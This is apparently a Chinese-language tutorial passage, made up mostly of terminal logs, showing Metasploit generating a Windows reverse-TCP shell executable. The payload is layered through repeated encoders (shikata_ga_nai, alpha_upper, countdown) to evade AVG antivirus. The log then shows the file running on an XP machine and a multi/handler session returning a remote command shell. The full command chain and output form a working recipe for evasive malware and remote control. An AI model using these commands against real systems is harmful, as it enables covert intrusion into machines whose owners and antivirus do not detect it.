root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 966 (iteration=1)
[*] x86/alpha_upper succeeded with size 2000 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)
[*] x86/countdown succeeded with size 2163 (iteration=1)
[*] x86/countdown succeeded with size 2181 (iteration=2)
[*] x86/countdown succeeded with size 2199 (iteration=3)
[*] x86/countdown succeeded with size 2217 (iteration=4)
[*] x86/countdown succeeded with size 2235 (iteration=5)
real 1m33.468s
user 0m52.195s
sys 0m39.830s
root@bt:~#
把read.exe上传到XP,然后在cmd运行,杀毒软件没报告威胁:
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>cd ..
C:\Documents and Settings>cd ..
C:\>read.exe
然后输入命令:
root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1181) at 2013-04-28 06:06:36 -0400
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 3052-FA52
C:\ 的目录
2012-03-24 11:55 0 AUTOEXEC.BAT
2013-04-28 16:06 131,820,480 avg_free_x86_all_2013.exe
2012-03-24 11:55 0 CONFIG.SYS
2012-03-24 11:59 <DIR> Documents and Settings
2013-04-28 17:08 <DIR> Program Files
2013-04-29 22:17 73,802 read.exe
2013-04-28 21:37 38 readme.txt
2013-04-28 15:19 <DIR> ruby
2013-04-28 20:45 <DIR> WINDOWS
5 个文件 131,894,320 字节
4 个目录 5,329,256,448 可用字节
C:\>
这样就打开了一个远程的shell,并且没有“惊动”avg这个杀毒软件。